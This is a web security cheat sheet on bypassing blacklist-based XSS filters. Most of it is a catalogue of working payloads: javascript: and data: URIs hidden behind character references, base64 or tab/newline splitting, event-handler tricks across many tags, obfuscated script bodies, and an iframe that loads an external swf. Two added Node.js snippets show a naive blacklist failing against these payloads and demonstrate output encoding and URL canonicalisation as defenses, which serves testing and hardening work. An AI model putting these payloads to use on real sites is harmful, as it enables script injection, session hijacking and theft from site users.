Bypassing XSS filters

In XSS, many HTML tags, event handler attributes and URL-bearing attributes can be used to execute JavaScript. A filter that blacklists a subset of them is bypassed by whatever it left out.

  • Tags that can execute JavaScript:
    <script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <select> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio>
  • Event handler attributes that execute JavaScript (the payloads below also use onerror, onscroll and onstart):

    onload onunload onchange onsubmit onreset onselect onblur onfocus onabort onerror onscroll onstart onkeydown onkeypress onkeyup onclick ondblclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop

  • Attributes that take a URL (and so accept javascript: or data:) or that help fire a handler without user interaction (autofocus):
    formaction action href xlink:href autofocus src content data
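The three lists above are exactly what a blacklist filter is built from, and the rest of this page is a catalogue of inputs such a filter misses. As an added example (not code from the original page), the following Node.js snippet builds that filter from the lists as written, feeds it payload shapes taken from the Bypassing section, and sets the result beside the defense that does not depend on any list: encoding for the HTML output context. The payload set is constructed here, and the `naiveBlacklistAllows` regexes are a typical filter pattern, not any specific product's.

```javascript
// Added example, not code from the original page: a blacklist built from
// the tag/event/attribute lists above, the payload shapes this page uses
// against it, and the encoding defense that needs no such lists.
// Runs under Node.js with no dependencies.

const TAGS = ['script', 'a', 'p', 'img', 'body', 'button', 'var', 'div',
  'iframe', 'object', 'input', 'select', 'textarea', 'keygen', 'frameset',
  'embed', 'svg', 'math', 'video', 'audio'];
const EVENTS = ['onload', 'onunload', 'onchange', 'onsubmit', 'onreset',
  'onselect', 'onblur', 'onfocus', 'onabort', 'onkeydown', 'onkeypress',
  'onkeyup', 'onclick', 'ondblclick', 'onmouseover', 'onmousemove',
  'onmouseout', 'onmouseup', 'onforminput', 'onformchange', 'ondrag', 'ondrop'];
const URL_ATTRS = ['formaction', 'action', 'href', 'xlink:href', 'src', 'content', 'data'];

// The filter as it is usually written: reject input that opens a listed
// tag, carries a listed event handler preceded by whitespace, or puts a
// literal "javascript:" at the start of a URL attribute. Returns true
// when the input is let through.
function naiveBlacklistAllows(html) {
  const tagRe = new RegExp('<\\s*/?\\s*(' + TAGS.join('|') + ')\\b', 'i');
  const eventRe = new RegExp('\\s(' + EVENTS.join('|') + ')\\s*=', 'i');
  const urlRe = new RegExp('(' + URL_ATTRS.join('|') + ')\\s*=\\s*["\']?\\s*javascript:', 'i');
  return !(tagRe.test(html) || eventRe.test(html) || urlRe.test(html));
}

// Constructed inputs mirroring the Bypassing section of this page.
const PAYLOADS = {
  listedTag:      '<script>alert(1)</script>',            // caught: tag is on the list
  listedEvent:    '<img src=x onerror=alert(1)>',         // caught only because <img> is listed; onerror is not in EVENTS
  arbitraryTag:   '<M/onclick="alert(1)">M',              // unlisted tag, "/" instead of a space before the handler
  slashSeparator: '<b/ondrag=alert()>M',                  // listed event, but nothing whitespace-like precedes it
  unlistedEvent:  '<marquee onstart="alert(1)"></marquee>', // neither tag nor event is on a list
  encodedScheme:  '<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', // no literal "javascript:"
};

// Map of payload name -> whether the blacklist lets it through.
function filterReport() {
  const report = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    report[name] = naiveBlacklistAllows(payload);
  }
  return report;
}

// The defense that makes the lists irrelevant: encode for the output
// context. In HTML text and quoted attribute values only these five
// characters can change how the parser reads the rest of the document.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Once encoded, no payload can open a tag or close an attribute: every
// remaining "&" is one of our own escapes, so the browser renders text.
function encodedIsInert(untrusted) {
  const encoded = encodeForHtml(untrusted);
  return !/[<>"']/.test(encoded) && !/&(?!(amp|lt|gt|quot|#x27);)/.test(encoded);
}

console.log(filterReport());
console.log(encodeForHtml(PAYLOADS.arbitraryTag));
```

Run it with `node`; `filterReport()` shows which payloads slip through, and `encodedIsInert()` confirms that after `encodeForHtml()` none of them can open a tag or leave an attribute. A blacklist that does catch `<script>` and `<img>` still misses any tag not on its list, any handler written after `/` instead of a space, any event it forgot (onerror, onstart), and any scheme hidden behind a character reference.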

Bypassing

  • Use an arbitrary tag name to bypass a blacklist of known dangerous tags; any element accepts event handler attributes
    <M/onclick="alert(1)">M
  • Use "/" instead of spaces as the separator between tag name and attributes
    <img/src=x onerror=alert(1)>
  • Use a short payload when the injection point limits length
    <b/ondrag=alert()>M
  • javascript: and data: URIs, obfuscated with HTML character references and URL encoding
    <a href=javascript:alert(2)>M
    <a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>
    <a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M
    <a href=j&#x61;v&#97script&#x3A;&#97lert(13)>M
    <a href=javascript&colon;confirm(2)>M
  • Combine with xlink:href inside <svg> or <math>
    <svg><a xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a></svg>
    <math><a xlink:href=javascript:alert(1)>M
  • <script> tag
    <script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
    <script firefox>alert(1)</script>
    <script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script>
    <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>
    <script>prompt(-[])</script>
    <script>alert(String.fromCharCode(49))</script>
    <script>alert(/7/.source)</script>
    <script>setTimeout('alert(1)',0)</script>
  • <button> tag and HTML5 form attributes
    <button/onclick=alert(1) >M</button>
    <form><button formaction=javascript&colon;alert(1)>M
    <button onfocus=alert(1) autofocus>
  • <p> tag
    <p/onmouseover=javascript:alert(1); >M</p>
  • <img> tag
    <img src ?itworksonchrome?\/onerror = alert(1)>
    <img src=x onerror=window.open('http://google.com');>
    <img/src/onerror=alert(1)>
    <img src="x:kcf" onerror="alert(1)">
  • <body> tag
    <body onload=alert(1)>
    <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  • <var> tag
    <var onmouseover="prompt(1)">KCF</var>
  • <div> tag
    <div/onmouseover='alert(1)'>X
    <div style="position:absolute;top:0;left:0;width:100%;height:100%" onclick="alert(52)">
  • <iframe> tag
    <iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
    <iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
    <iframe SRC="http://0x.lv/xss.swf"></iframe>
    <IFRAME SRC="javascript:alert(1);"></IFRAME>
    <iframe/onload=alert(53)></iframe>
  • <meta> tag
    <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
    <meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
  • <object> tag
    <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
  • <marquee> tag
    <marquee onstart="alert('sometext')"></marquee>
  • <isindex> tag (obsolete; removed from current browsers, legacy targets only)
    <isindex type=image src=1 onerror=alert(1)>
    <isindex action=javascript:alert(1) type=image>
  • <input> tag
    <input onfocus=javascript:alert(1) autofocus>
    <input onblur=javascript:alert(1) autofocus><input autofocus>
  • <select> tag
    <select onfocus=javascript:alert(1) autofocus>
  • <textarea> tag
    <textarea onfocus=javascript:alert(1) autofocus>
  • <keygen> tag (obsolete; removed from current browsers, legacy targets only)
    <keygen onfocus=javascript:alert(1) autofocus>
  • <frameset> tag
    <FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
    <frameset onload=alert(1)>
  • <embed> tag
    <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></embed> // Chrome
    <embed src=javascript:alert(1)> // Firefox
  • <svg> tag
    <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
    <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
  • <math> tag
    <math href="javascript:javascript:alert(1)">CLICKME</math>
    <math><y/xlink:href=javascript:alert(51)>test1
    <math><maction actiontype="statusline#http://wangnima.com" xlink:href="javascript:alert(49)">CLICKME</maction></math>
  • <video> tag
    <video><source onerror="alert(1)">
    <video src=x onerror=alert(48)>
  • <audio> tag
    <audio src=x onerror=alert(47)>
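Several of the payloads above (`j&#x61;v&#97script&#x3A;`, `javascript&colon;`, the `&Tab;`/`&NewLine;` iframe variants, `&colon;` in formaction and meta refresh) never contain the string `javascript:` in the raw markup, yet the browser executes them: it decodes character references when it tokenises the attribute value, then strips tab, LF and CR when it parses the URL. As an added example (not code from the original page), the following Node.js snippet applies those same steps before classifying a value, next to the literal-string check that the payloads defeat. The `NAMED_REFS` table is deliberately limited to the references used on this page, and the scheme allowlist in `isAllowedLink` is an assumption about what an application needs.

```javascript
// Added example, not code from the original page: canonicalise an
// attribute value the way the browser does before deciding whether it
// carries a javascript: or data: URL. A filter that looks for the literal
// "javascript:" in raw markup never sees what the browser sees.
// Runs under Node.js with no dependencies.

// Named references used by the payloads on this page. HTML defines over
// two thousand; a real implementation must use the full table.
const NAMED_REFS = {
  colon: ':', NewLine: '\n', Tab: '\t', lt: '<', gt: '>', amp: '&', quot: '"', apos: "'",
};

// Step 1: the HTML tokenizer decodes character references inside attribute
// values. Numeric references (&#97; &#x61;) are decoded even without the
// trailing ";" (a parse error, but still decoded), which is what makes
// "&#97lert" read as "alert". Zero and out-of-range code points are left
// untouched here (simplification; the spec substitutes U+FFFD).
function decodeHtmlEntities(s) {
  return s.replace(/&(?:#([xX][0-9a-fA-F]+|[0-9]+);?|([A-Za-z]+);)/g, (whole, num, name) => {
    if (num !== undefined) {
      const cp = /^[xX]/.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : whole;
  });
}

// Step 2: the URL parser trims leading/trailing C0 controls and spaces,
// then deletes every ASCII tab, LF and CR wherever it appears. This is why
// "j&Tab;a&Tab;v..." and "j&NewLine;&Tab;a..." still resolve to javascript:.
function normaliseUrl(attrValue) {
  return decodeHtmlEntities(attrValue)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// Step 3: the scheme is compared case-insensitively.
function urlScheme(url) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// What the broken filter does: look for the literal prefix in raw input.
function naiveJavascriptCheck(attrValue) {
  return /^\s*javascript:/i.test(attrValue);
}

// What it should do at minimum: normalise first, then decide. True means
// "this value executes or loads attacker-controlled content".
function isScriptUrl(attrValue) {
  const scheme = urlScheme(normaliseUrl(attrValue));
  return scheme === 'javascript' || scheme === 'data';
}

// Better: admit only the schemes the application needs (assumed set) and
// relative URLs, instead of trying to recognise every bad one.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
function isAllowedLink(attrValue) {
  const scheme = urlScheme(normaliseUrl(attrValue));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Attribute values taken from the payloads on this page, plus one benign URL.
const SAMPLES = [
  'j&#x61;v&#97script&#x3A;&#97lert(13)',
  'javascript&colon;confirm(2)',
  'j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29',
  '&#10;&#9;javascript:alert(1)',
  'data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==',
  'https://example.com/profile',
];

for (const v of SAMPLES) {
  console.log(JSON.stringify(v), '->', JSON.stringify(normaliseUrl(v)),
    '| naive:', naiveJavascriptCheck(v), '| normalised:', isScriptUrl(v), '| allowed:', isAllowedLink(v));
}
```

The point is the order of operations: a filter has to canonicalise the value the way its consumer will (tokenizer first, URL parser second) or it is matching a string the browser never sees. Even then a blacklist of schemes is a guess about the browser; `isAllowedLink` inverts that and only lets through the handful of schemes the page actually needs.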